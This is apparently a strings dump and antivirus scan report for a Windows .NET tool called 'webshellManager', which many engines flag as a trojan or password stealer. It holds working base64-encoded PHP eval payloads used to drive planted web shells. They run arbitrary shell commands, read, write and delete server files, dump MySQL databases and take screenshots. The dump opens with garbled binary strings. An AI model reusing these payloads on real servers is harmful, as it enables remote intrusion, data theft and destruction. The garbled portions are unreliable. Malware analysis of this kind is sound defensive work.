@;;8?PU
@<@@AOU
<*,n=*,
=),u<*,
>)+|=*,
>'.!>*+
<(/&=)-
@).,=+,
<(-3=*,
<*-U=),
>*-[;''
?(-9>*+
>+-Z;''
<,,@=*-
<++M=*,
>+-Z;''
<++H=*,
<++Y@++
=*-O>),
<++Y@++
>*,V=+,
<**7=*,
=)+X@++
<),]<*,
=)+XF..
=)+d=*,
>),WF..
=+-l=*,
@(0 =*,
>),WF..
>*,s=*,
<*,n=*,
>*,V=))
=*,z=*,
>),W=*,
?++A=*,
=++*=*,
>+-x=*,
<*,b=*,
=),K=*,
?++5=*,
=)+d=*,
>++k=*,
<+-r=*,
=*,z=*,
@(0 <*,
<(/&=*+
@).,=+,
=).2>+,
?(-9=*,
<,,@=*-
<++H=*,
=*-O>),
>),W=+,
<),]=+,
;,,4=*,
>,,:=*,
?++A<*,
=++G=*,
<++M<*+
=++T=*-
>+-Z>*,
<*-a=*,
>*-g=),
<*,n=),
>*,t=+,
:,,#<),{=+,
>,,)=*+
:++0<*+
=++6=)-
?*.=<)-
=*.C=+,
>)-J>+,
=)-P=+,
>),W>+,
<),]=+,
>),c=*,
<)+j=*,
=)+p=*-
@(0 <+-w=*-
<(/&=+-}=*-
@).,>+,
<(-3=+,
?(-9>*,
=(-?=*,
>,,F>*,
<,,L=*,
=++S>*,
<++Y=*-
=+-`=*-
<+-f<*,
=*,m=*,
>*,s>),
<--"=*,z=),
>*-[=*-
<*,b=*,
=),i=*,
=)+p=*-
<+-w=*,
=++T=*+
=+-~=*,
<*-U=*,
?++A@++$>*+
=(-?=*,
>,,)=*,
<+-w=*,
=+-`=*,
:))=+,
@++$>*,
=++*=*,
:++0=*,
<**7=),
>)-><+,
?),E=*,
<,,L=*-
<*-a=*,
<++/>59
=,,.=68
?++5>78
=++;=7:
>++B?8;
<++H>8<
=*-O?8>
<*-U>9>
=*,\?:=
;,.c>:>
>-0k>9=
?/1r?9;
:))=.2z>7<
>))%?35
;**+=47
=).2=48
?(-9=7:
=(-?=7:
>,,F?8;
<,,L>8<
=++S<*+
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
picture
label1
wsManager 1.0
https://github.com/guillaC
aboutForm
Add -
=echo "
this webshell is already registered
tbParam
btnAdd
lblURL
lblParameter
Get Parameter:
addWebshellForm
spbedwtIN
NKAGdy
File Information -
lvInformations
fileInformationsForm
File Manager -
this is not a File object
this is not a Folder object
folder
folder name
file name
upload
filename
must be compressed.
tbPath
lvExplorer
Modification Date
Permisions
cmsFileManager
tsmiRename
Rename
tsmiDelete
Delete
tsmiZIP
Compress
tsmiDownload
Download
tsmiUpload
Upload from URL
tsmiNDir
New directory
tsmiProperties
Properties
imgListExplorer.ImageStream
btnOpn
fileManagerForm
Server Information -
informationsForm
Php Exec -
webBrowser
btnExec
Execute
phpForm
Screenviewer -
screen
btnScrnShot
Screenshot
screenshotForm
Shell -
Courier New
tbOutput
tbShell
shellForm
SQL -
SHOW DATABASES;
SHOW TABLES;
<table border="1"><thead><tr>
</tr></thead><tbody><tr><tbody>
</tbody></table>
SELECT * FROM
btnGetDbsTbls
Get DBs && tables
treeDB
lblDtb
Database:
Password:
lblHost
tbpass
tbuname
tbHost
127.0.0.1
select * from table
btnExecSql
lblLogin
Login:
html|*.html
cmsSQL
exportToolStripMenuItem
Export
sqlForm
=eval(base64_decode("ZWNobyAiLcKkLSIuQHBocF91bmFtZShzKS4iLcKkLS3CpC0iLkBwaHBfdW5hbWUobikuIi3CpC0twqQtIi5AcGhwX3VuYW1lKHIpLiItwqQtLcKkLSIuJF9TRVJWRVJbJ1NFUlZFUl9TT0ZUV0FSRSddLiItwqQtLcKkLSIuRElSRUNUT1JZX1NFUEFSQVRPUi4iLcKkLSI7"));
-(.*?)-
Hostname
Release Name
Server Software
=eval(base64_decode("ZWNobyAiLcKkLSIuQHBocF91bmFtZShzKS4iLcKkLS3CpC0iLkBwaHBfdW5hbWUobikuIi3CpC0twqQtIi5AcGhwX3VuYW1lKHIpLiItwqQtLcKkLSIuQHBocF91bmFtZSh2KS4iLcKkLS3CpC0iLkBwaHBfdW5hbWUobSkuIi3CpC0twqQtIi4kX1NFUlZFUlsnU0VSVkVSX05BTUUnXS4iLcKkLS3CpC0iLiRfU0VSVkVSWydTRVJWRVJfQUREUiddLiItwqQtLcKkLSIuJF9TRVJWRVJbJ1NFUlZFUl9TT0ZUV0FSRSddLiItwqQtLcKkLSIuJF9TRVJWRVJbJ1NFUlZFUl9QUk9UT0NPTCddLiItwqQtLcKkLSIuJF9TRVJWRVJbJ1JFUVVFU1RfVElNRSddLiItwqQtLcKkLSIuJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4iLcKkLS3CpC0iLiRfU0VSVkVSWydTQ1JJUFRfRklMRU5BTUUnXS4iLcKkLS3CpC0iLiRfU0VSVkVSWydTRVJWRVJfQURNSU4nXS4iLcKkLS3CpC0iLnBocHZlcnNpb24oKS4iLcKkLSI7"));
Version Information
Machine type
Server Name
Server Address
Server Protocol
Request Time
Document Root
Script FileName
Server Admin
PHP version
=eval(base64_decode("JGQ9bmV3IERpcmVjdG9yeUl0ZXJhdG9yKGJhc2U2NF9kZWNvZGUoJF9HRVRbJ2MnXSkpO2ZvcmVhY2goJGQgYXMgJGspe2lmKCRrLT5pc1JlYWRhYmxlKCk9PWZhbHNlIG9yICRrLT5pc0RvdCgpKWNvbnRpbnVlO2lmKCRrLT5nZXRUeXBlKCk9PSJkaXIiKSR2YXI9JiRmb2xkZXI7ZWxzZSAkdmFyPSYkZmlsZTskdmFyLj0iLWl0bS0twqQtIi51dGY4X2VuY29kZSgieyRrfSIpLiItwqQtLcKkLSIuJGstPmdldFNpemUoKS4iLcKkLS3CpC0iLkBzdWJzdHIoc3ByaW50ZignJW8nLCRrLT5nZXRQZXJtcygpKSwtNCkuIi3CpC0twqQtIi5kYXRlKCdtL2QvWSBoOm06cycsJGstPmdldE1UaW1lKCkpLiItwqQtLcKkLSIuQG1pbWVfY29udGVudF90eXBlKCRrLT5nZXRSZWFsUGF0aCgpKS4iLcKkLS1pdG0tIjt9ZWNobyAiLXB0aMKkLSIucmVhbHBhdGgoYmFzZTY0X2RlY29kZSgkX0dFVFsnYyddKSkuIi1wdGjCpC0iLiItZmlsZcKkLSIuJGZpbGUuIi1maWxlwqQtIi4iLWZvbGRlcsKkLSIuJGZvbGRlci4iLWZvbGRlcsKkLSI7"));&c=
-(.*?)-file
-folder
(.*?)-folder
-(.*?)-pth
-itm-(.*?)-itm-
=eval(base64_decode("JGM9YmFzZTY0X2RlY29kZSgkX0dFVFsnYyddKTtlY2hvICItwqQtIi5kYXRlKCJkLW0tWSBIOmk6cyIsZmlsZWF0aW1lKCRjKSkuIi3CpC0twqQtIi5kYXRlKCJkLW0tWSBIOmk6cyIsZmlsZWN0aW1lKCRjKSkuIi3CpC0twqQtIi5kYXRlKCJkLW0tWSBIOmk6cyIsZmlsZW10aW1lKCRjKSkuIi3CpC0twqQtIi5maWxlc2l6ZSgkYykuIi3CpC0twqQtIi5taW1lX2NvbnRlbnRfdHlwZSgkYykuIi3CpC0iOw=="));&c=
Last access
Last change
Last modified
Mime content type
=eval(base64_decode(base64_decode("SkdFOVlYSnlZWGtvS1Rza1lqMXRlWE54YkdsZlkyOXVibVZqZENoaVlYTmxOalJmWkdWamIyUmxLQ1JmUjBWVVd5SmpJbDBwTEdKaApjMlUyTkY5a1pXTnZaR1VvSkY5SFJWUmJJbVFpWFNrc1ltRnpaVFkwWDJSbFkyOWtaU2drWDBkRlZGc2laU0pkS1N4aVlYTmxOalJmClpHVmpiMlJsS0NSZlIwVlVXeUptSWwwcEtUc2taVDF0ZVhOeGJHbGZjWFZsY25rb0pHSXNZbUZ6WlRZMFgyUmxZMjlrWlNna1gwZEYKVkZzaVp5SmRLU2s3ZDJocGJHVW9KSEp2ZHowa1pTMCtabVYwWTJoZllYSnlZWGtvVFZsVFVVeEpYMEZUVTA5REtTbGhjbkpoZVY5dwpkWE5vS0NSaExDUnliM2NwTzJadmNtVmhZMmdvWVhKeVlYbGZhMlY1Y3lna1lWc3dYU2xoY3lBa2F5bGxZMmh2SUNjdFkyOXN3cVF0Ckp5NGtheTRuTFdOdmJNS2tMU2M3Wm05eVpXRmphQ2drWVNCaGN5QWtiR2x1WlNsN1pXTm9ieUFuTGNLa0xTYzdabTl5WldGamFDaGgKY25KaGVWOTJZV3gxWlhNb0pHeHBibVVwWVhNZ0pHbDBiU2xsWTJodklDY3RhWFJ0d3FRdEp5NGthWFJ0TGljdGFYUnR3cVF0Snp0bApZMmh2SUNjdHdxUXRKenQ5")));&c=
-(.*?)-col
-(.*?)-itm
=eval(base64_decode("JGltPWltYWdlZ3JhYnNjcmVlbigpO29iX3N0YXJ0KCk7aW1hZ2VwbmcoJGltKTskaW1hZ2VkYXRhPW9iX2dldF9jb250ZW50cygpO29iX2VuZF9jbGVhbigpO2VjaG8gIi1pdG0tIi5iYXNlNjRfZW5jb2RlKCRpbWFnZWRhdGEpLiItaXRtLSI7"));
=eval(base64_decode("bWtkaXIoaWNvbnYoIlVURi04IiwgIkNQMTI1MiIsIGJhc2U2NF9kZWNvZGUoJF9HRVRbImMiXSkpKTs="));&c=
=eval(base64_decode("JGw9aWNvbnYoIlVURi04IiwiQ1AxMjUyIixiYXNlNjRfZGVjb2RlKCRfR0VUWyJjIl0pKTtpZihpc19kaXIoJGwpKXtpZihQSFBfT1M9PT0nV2luZG93cycpe2V4ZWMoJ3JtZGlyIC1yZiAiJy4kbC4nIicpO31lbHNle2V4ZWMoJ3JkIC9zIC9xICInLiRsLiciJyk7fX1lbHNle3VubGluaygkbCk7fQ=="));&c=
=eval(base64_decode("cmVuYW1lKGljb252KCJVVEYtOCIsIkNQMTI1MiIsYmFzZTY0X2RlY29kZSgkX0dFVFsiYyJdKSksaWNvbnYoIlVURi04IiwiQ1AxMjUyIixiYXNlNjRfZGVjb2RlKCRfR0VUWyJkIl0pKSk7"));&c=
=eval(base64_decode(base64_decode("SkhBOWFXTnZibllvSWxWVVJpMDRJaXdpUTFBeE1qVXlJaXhpWVhObE5qUmZaR1ZqYjJSbEtDUmZSMFZVV3lKaklsMHBLVHNrY0hvOWFXTnZibllvSWxWVVJpMDRJaXdpUTFBeE1qVXlJaXhpWVhObE5qUmZaR1ZqYjJSbEtDUmZSMFZVV3lKaklsMHBLUzRpTGxwSlVDSTdKSG85Ym1WM0lGcHBjRUZ5WTJocGRtVTdhV1lvSkhvdFBtOXdaVzRvSkhCNkxGcHBjRUZ5WTJocGRtVTZPa05TUlVGVVJTazlQVDFVVWxWRktYdHBaaWhwYzE5a2FYSW9KSEFwS1hza1ptWTlibVYzSUZKbFkzVnljMmwyWlVsMFpYSmhkRzl5U1hSbGNtRjBiM0lvYm1WM0lGSmxZM1Z5YzJsMlpVUnBjbVZqZEc5eWVVbDBaWEpoZEc5eUtDUndLU3hTWldOMWNuTnBkbVZKZEdWeVlYUnZja2wwWlhKaGRHOXlPanBNUlVGV1JWTmZUMDVNV1NrN1ptOXlaV0ZqYUNna1ptWWdZWE1nSkc1aGJXVTlQaVJtS1h0cFppZ2hKR1l0UG1selJHbHlLQ2twZXlSbWNEMGtaaTArWjJWMFVtVmhiRkJoZEdnb0tUc2tjbkE5YzNWaWMzUnlLQ1JtY0N4emRISnNaVzRvSkhBcEt6RXBPeVI2TFQ1aFpHUkdhV3hsS0NSbWNDd2tjbkFwTzMxOWZXVnNjMlY3SkhvdFBtRmtaRVpwYkdVb0pIQXNZbUZ6Wlc1aGJXVW9KSEFwS1R0OUpIb3RQbU5zYjNObEtDazdmV1ZqYUc4Z0pIQjZPdz09")));&c=
=eval(base64_decode("ZmlsZV9wdXRfY29udGVudHMoaWNvbnYoIlVURi04IiwgIkNQMTI1MiIsIGJhc2U2NF9kZWNvZGUoJF9HRVRbImQiXSkpLCBmaWxlX2dldF9jb250ZW50cyhiYXNlNjRfZGVjb2RlKCRfR0VUWyJjIl0pKSk7"));&c=
=eval(base64_decode("ZWNobyAiLcKkLSIuYmFzZTY0X2VuY29kZShmaWxlX2dldF9jb250ZW50cyhpY29udigiVVRGLTgiLCAiQ1AxMjUyIiwgYmFzZTY0X2RlY29kZSgkX0dFVFsiYyJdKSkpKS4iLcKkLSI7"));&c=
=eval(base64_decode("JGMgPSBiYXNlNjRfZGVjb2RlKCRfR0VUWyJjIl0pOyAkbCA9IGRpcm5hbWUoX19GSUxFX18pIC4gIi9zaGNtZC50eHQiOyBpZiAoUEhQX09TID09ICdXSU5OVCcgfHwgUEhQX09TID09ICdXSU4zMicgfHwgUEhQX09TID09ICdXaW5kb3dzJykgeyBzaGVsbF9leGVjKCRjIC4gIj4iIC4gJGwpOyAkbyA9IGZpbGVfZ2V0X2NvbnRlbnRzKCRsKTsgaWYgKGZpbGVfZXhpc3RzKCRsKSkgdW5saW5rKCRsKTsgfSBlbHNlIHsgJG8gPSBzaGVsbF9leGVjKCRjKTsgfSBlY2hvICItwqQtIiAuICRvIC4gIi3CpC0iOw=="));&c=
echo "-
=eval(base64_decode("
error.
The selected webshell is not in the list of webshells
server(s)
\webshells.dat
data saved in webshells.dat
can't load the data of webshells.dat
statusStrip
x servers
tssLabel
0 server(s)
lvWebShells
Release name
cMenuStripLV
informationsToolStripMenuItem
Information
fileManagerToolStripMenuItem
File Manager
shellToolStripMenuItem
sQLExplorerToolStripMenuItem
SQL Explorer
ScreenshotToolStripMenuItem
toolStripSeparator1
deleteToolStripMenuItem
toolStrip
tsButtonAdd.Image
tsButtonAdd
tsButtonSave.Image
tsButtonSave
toolStripSeparator2
tsButtonAbout.Image
tsButtonAbout
pHPExecToolStripMenuItem
PHP Exec
wsManagerForm
wsManager
webshellManager
ZBJUCE57ZE7AF4JZ
FormDelegates.SmartExtensions
webshellManager.Properties.Resources
Setting0
ZWNobyAiLcKkLSIuQHBocF91bmFtZShzKS4iLcKkLS3CpC0iLkBwaHBfdW5hbWUobikuIi3CpC0twqQtIi5AcGhwX3VuYW1lKHIpLiItwqQtLcKkLSIuJF9TRVJWRVJbJ1NFUlZFUl9TT0ZUV0FSRSddLiItwqQtLcKkLSIuRElSRUNUT1JZX1NFUEFSQVRPUi4iLcKkLSI7
ZWNobyAiLcKkLSIuQHBocF91bmFtZShzKS4iLcKkLS3CpC0iLkBwaHBfdW5hbWUobikuIi3CpC0twqQtIi5AcGhwX3VuYW1lKHIpLiItwqQtLcKkLSIuQHBocF91bmFtZSh2KS4iLcKkLS3CpC0iLkBwaHBfdW5hbWUobSkuIi3CpC0twqQtIi4kX1NFUlZFUlsnU0VSVkVSX05BTUUnXS4iLcKkLS3CpC0iLiRfU0VSVkVSWydTRVJWRVJfQUREUiddLiItwqQtLcKkLSIuJF9TRVJWRVJbJ1NFUlZFUl9TT0ZUV0FSRSddLiItwqQtLcKkLSIuJF9TRVJWRVJbJ1NFUlZFUl9QUk9UT0NPTCddLiItwqQtLcKkLSIuJF9TRVJWRVJbJ1JFUVVFU1RfVElNRSddLiItwqQtLcKkLSIuJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4iLcKkLS3CpC0iLiRfU0VSVkVSWydTQ1JJUFRfRklMRU5BTUUnXS4iLcKkLS3CpC0iLiRfU0VSVkVSWydTRVJWRVJfQURNSU4nXS4iLcKkLS3CpC0iLnBocHZlcnNpb24oKS4iLcKkLSI7
JGMgPSBiYXNlNjRfZGVjb2RlKCRfR0VUWyJjIl0pOyAkbCA9IGRpcm5hbWUoX19GSUxFX18pIC4gIi9zaGNtZC50eHQiOyBpZiAoUEhQX09TID09ICdXSU5OVCcgfHwgUEhQX09TID09ICdXSU4zMicgfHwgUEhQX09TID09ICdXaW5kb3dzJykgeyBzaGVsbF9leGVjKCRjIC4gIj4iIC4gJGwpOyAkbyA9IGZpbGVfZ2V0X2NvbnRlbnRzKCRsKTsgaWYgKGZpbGVfZXhpc3RzKCRsKSkgdW5saW5rKCRsKTsgfSBlbHNlIHsgJG8gPSBzaGVsbF9leGVjKCRjKTsgfSBlY2hvICItwqQtIiAuICRvIC4gIi3CpC0iOw==
JGQ9bmV3IERpcmVjdG9yeUl0ZXJhdG9yKGJhc2U2NF9kZWNvZGUoJF9HRVRbJ2MnXSkpO2ZvcmVhY2goJGQgYXMgJGspe2lmKCRrLT5pc1JlYWRhYmxlKCk9PWZhbHNlIG9yICRrLT5pc0RvdCgpKWNvbnRpbnVlO2lmKCRrLT5nZXRUeXBlKCk9PSJkaXIiKSR2YXI9JiRmb2xkZXI7ZWxzZSAkdmFyPSYkZmlsZTskdmFyLj0iLWl0bS0twqQtIi51dGY4X2VuY29kZSgieyRrfSIpLiItwqQtLcKkLSIuJGstPmdldFNpemUoKS4iLcKkLS3CpC0iLkBzdWJzdHIoc3ByaW50ZignJW8nLCRrLT5nZXRQZXJtcygpKSwtNCkuIi3CpC0twqQtIi5kYXRlKCdtL2QvWSBoOm06cycsJGstPmdldE1UaW1lKCkpLiItwqQtLcKkLSIuQG1pbWVfY29udGVudF90eXBlKCRrLT5nZXRSZWFsUGF0aCgpKS4iLcKkLS1pdG0tIjt9ZWNobyAiLXB0aMKkLSIucmVhbHBhdGgoYmFzZTY0X2RlY29kZSgkX0dFVFsnYyddKSkuIi1wdGjCpC0iLiItZmlsZcKkLSIuJGZpbGUuIi1maWxlwqQtIi4iLWZvbGRlcsKkLSIuJGZvbGRlci4iLWZvbGRlcsKkLSI7
JGM9YmFzZTY0X2RlY29kZSgkX0dFVFsnYyddKTtlY2hvICItwqQtIi5kYXRlKCJkLW0tWSBIOmk6cyIsZmlsZWF0aW1lKCRjKSkuIi3CpC0twqQtIi5kYXRlKCJkLW0tWSBIOmk6cyIsZmlsZWN0aW1lKCRjKSkuIi3CpC0twqQtIi5kYXRlKCJkLW0tWSBIOmk6cyIsZmlsZW10aW1lKCRjKSkuIi3CpC0twqQtIi5maWxlc2l6ZSgkYykuIi3CpC0twqQtIi5taW1lX2NvbnRlbnRfdHlwZSgkYykuIi3CpC0iOw==
bWtkaXIoaWNvbnYoIlVURi04IiwgIkNQMTI1MiIsIGJhc2U2NF9kZWNvZGUoJF9HRVRbImMiXSkpKTs=
JGw9aWNvbnYoIlVURi04IiwiQ1AxMjUyIixiYXNlNjRfZGVjb2RlKCRfR0VUWyJjIl0pKTtpZihpc19kaXIoJGwpKXtpZihQSFBfT1M9PT0nV2luZG93cycpe2V4ZWMoJ3JtZGlyIC1yZiAiJy4kbC4nIicpO31lbHNle2V4ZWMoJ3JkIC9zIC9xICInLiRsLiciJyk7fX1lbHNle3VubGluaygkbCk7fQ==
cmVuYW1lKGljb252KCJVVEYtOCIsIkNQMTI1MiIsYmFzZTY0X2RlY29kZSgkX0dFVFsiYyJdKSksaWNvbnYoIlVURi04IiwiQ1AxMjUyIixiYXNlNjRfZGVjb2RlKCRfR0VUWyJkIl0pKSk7
ZmlsZV9wdXRfY29udGVudHMoaWNvbnYoIlVURi04IiwgIkNQMTI1MiIsIGJhc2U2NF9kZWNvZGUoJF9HRVRbImQiXSkpLCBmaWxlX2dldF9jb250ZW50cyhiYXNlNjRfZGVjb2RlKCRfR0VUWyJjIl0pKSk7
ZWNobyAiLcKkLSIuYmFzZTY0X2VuY29kZShmaWxlX2dldF9jb250ZW50cyhpY29udigiVVRGLTgiLCAiQ1AxMjUyIiwgYmFzZTY0X2RlY29kZSgkX0dFVFsiYyJdKSkpKS4iLcKkLSI7
JGltPWltYWdlZ3JhYnNjcmVlbigpO29iX3N0YXJ0KCk7aW1hZ2VwbmcoJGltKTskaW1hZ2VkYXRhPW9iX2dldF9jb250ZW50cygpO29iX2VuZF9jbGVhbigpO2VjaG8gIi1pdG0tIi5iYXNlNjRfZW5jb2RlKCRpbWFnZWRhdGEpLiItaXRtLSI7
SkdFOVlYSnlZWGtvS1Rza1lqMXRlWE54YkdsZlkyOXVibVZqZENoaVlYTmxOalJmWkdWamIyUmxLQ1JmUjBWVVd5SmpJbDBwTEdKaApjMlUyTkY5a1pXTnZaR1VvSkY5SFJWUmJJbVFpWFNrc1ltRnpaVFkwWDJSbFkyOWtaU2drWDBkRlZGc2laU0pkS1N4aVlYTmxOalJmClpHVmpiMlJsS0NSZlIwVlVXeUptSWwwcEtUc2taVDF0ZVhOeGJHbGZjWFZsY25rb0pHSXNZbUZ6WlRZMFgyUmxZMjlrWlNna1gwZEYKVkZzaVp5SmRLU2s3ZDJocGJHVW9KSEp2ZHowa1pTMCtabVYwWTJoZllYSnlZWGtvVFZsVFVVeEpYMEZUVTA5REtTbGhjbkpoZVY5dwpkWE5vS0NSaExDUnliM2NwTzJadmNtVmhZMmdvWVhKeVlYbGZhMlY1Y3lna1lWc3dYU2xoY3lBa2F5bGxZMmh2SUNjdFkyOXN3cVF0Ckp5NGtheTRuTFdOdmJNS2tMU2M3Wm05eVpXRmphQ2drWVNCaGN5QWtiR2x1WlNsN1pXTm9ieUFuTGNLa0xTYzdabTl5WldGamFDaGgKY25KaGVWOTJZV3gxWlhNb0pHeHBibVVwWVhNZ0pHbDBiU2xsWTJodklDY3RhWFJ0d3FRdEp5NGthWFJ0TGljdGFYUnR3cVF0Snp0bApZMmh2SUNjdHdxUXRKenQ5
SkhBOWFXTnZibllvSWxWVVJpMDRJaXdpUTFBeE1qVXlJaXhpWVhObE5qUmZaR1ZqYjJSbEtDUmZSMFZVV3lKaklsMHBLVHNrY0hvOWFXTnZibllvSWxWVVJpMDRJaXdpUTFBeE1qVXlJaXhpWVhObE5qUmZaR1ZqYjJSbEtDUmZSMFZVV3lKaklsMHBLUzRpTGxwSlVDSTdKSG85Ym1WM0lGcHBjRUZ5WTJocGRtVTdhV1lvSkhvdFBtOXdaVzRvSkhCNkxGcHBjRUZ5WTJocGRtVTZPa05TUlVGVVJTazlQVDFVVWxWRktYdHBaaWhwYzE5a2FYSW9KSEFwS1hza1ptWTlibVYzSUZKbFkzVnljMmwyWlVsMFpYSmhkRzl5U1hSbGNtRjBiM0lvYm1WM0lGSmxZM1Z5YzJsMlpVUnBjbVZqZEc5eWVVbDBaWEpoZEc5eUtDUndLU3hTWldOMWNuTnBkbVZKZEdWeVlYUnZja2wwWlhKaGRHOXlPanBNUlVGV1JWTmZUMDVNV1NrN1ptOXlaV0ZqYUNna1ptWWdZWE1nSkc1aGJXVTlQaVJtS1h0cFppZ2hKR1l0UG1selJHbHlLQ2twZXlSbWNEMGtaaTArWjJWMFVtVmhiRkJoZEdnb0tUc2tjbkE5YzNWaWMzUnlLQ1JtY0N4emRISnNaVzRvSkhBcEt6RXBPeVI2TFQ1aFpHUkdhV3hsS0NSbWNDd2tjbkFwTzMxOWZXVnNjMlY3SkhvdFBtRmtaRVpwYkdVb0pIQXNZbUZ6Wlc1aGJXVW9KSEFwS1R0OUpIb3RQbU5zYjNObEtDazdmV1ZqYUc4Z0pIQjZPdz09
imgListExplorer.ImageStream
tsButtonAbout.Image
tsButtonAdd.Image
tsButtonSave.Image
spbedwtIN
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
FileDescription
wsManager
FileVersion
0.8.0.0
InternalName
xUFls2Uu7.exe
LegalCopyright
Copyright
Fayva
LegalTrademarks
OriginalFilename
xUFls2Uu7.exe
ProductName
webshellManager
ProductVersion
0.8.0.0
Assembly Version
0.8.0.0
Antivirus Signature
Bkav Clean
Elastic malicious (high confidence)
ClamAV Clean
CMC Clean
CAT-QuickHeal Clean
ALYac Clean
Malwarebytes Trojan.MalPack.PNG.Generic
Zillya Clean
AegisLab Trojan.Multi.Generic.4!c
Sangfor Clean
K7AntiVirus Clean
BitDefender Clean
K7GW Trojan ( 0057cb191 )
Cybereason malicious.9e2a4a
Baidu Clean
Cyren W32/MSIL_Kryptik.EIA.gen!Eldorado
Symantec ML.Attribute.HighConfidence
ESET-NOD32 a variant of MSIL/GenKryptik.FFOG
APEX Malicious
Paloalto generic.ml
Cynet Malicious (score: 100)
Kaspersky HEUR:Trojan-PSW.MSIL.Agensla.gen
Alibaba Trojan:Win32/Kryptik.ali2000016
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Clean
Rising Trojan.GenKryptik!8.AA55 (CLOUD)
Ad-Aware Clean
Emsisoft Clean
Comodo Clean
F-Secure Clean
DrWeb Trojan.Inject4.11986
VIPRE Clean
TrendMicro Clean
McAfee-GW-Edition BehavesLike.Win32.Generic.ch
FireEye Generic.mg.af79da4c3ea78613
Sophos Mal/Generic-S
SentinelOne Static AI - Malicious PE
Jiangmin Clean
Webroot Clean
Avira Clean
MAX malware (ai score=99)
Microsoft Trojan:Win32/Sabsik.FL.A!ml
Gridinsoft Clean
Arcabit Clean
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan-PSW.MSIL.Agensla.gen
GData Clean
AhnLab-V3 Clean
Acronis Clean
McAfee Artemis!AF79DA4C3EA7
TACHYON Clean
VBA32 Clean
Cylance Unsafe
Panda Clean
Zoner Clean
TrendMicro-HouseCall Clean
Tencent Clean
Yandex Clean
Ikarus Clean
MaxSecure Trojan.Malware.300983.susgen
Fortinet MSIL/Kryptik.AAYL!tr
BitDefenderTheta Clean
AVG Win32:PWSX-gen [Trj]
Avast Win32:PWSX-gen [Trj]
CrowdStrike win/malicious_confidence_90% (W)
Qihoo-360 Clean
No IRMA results available.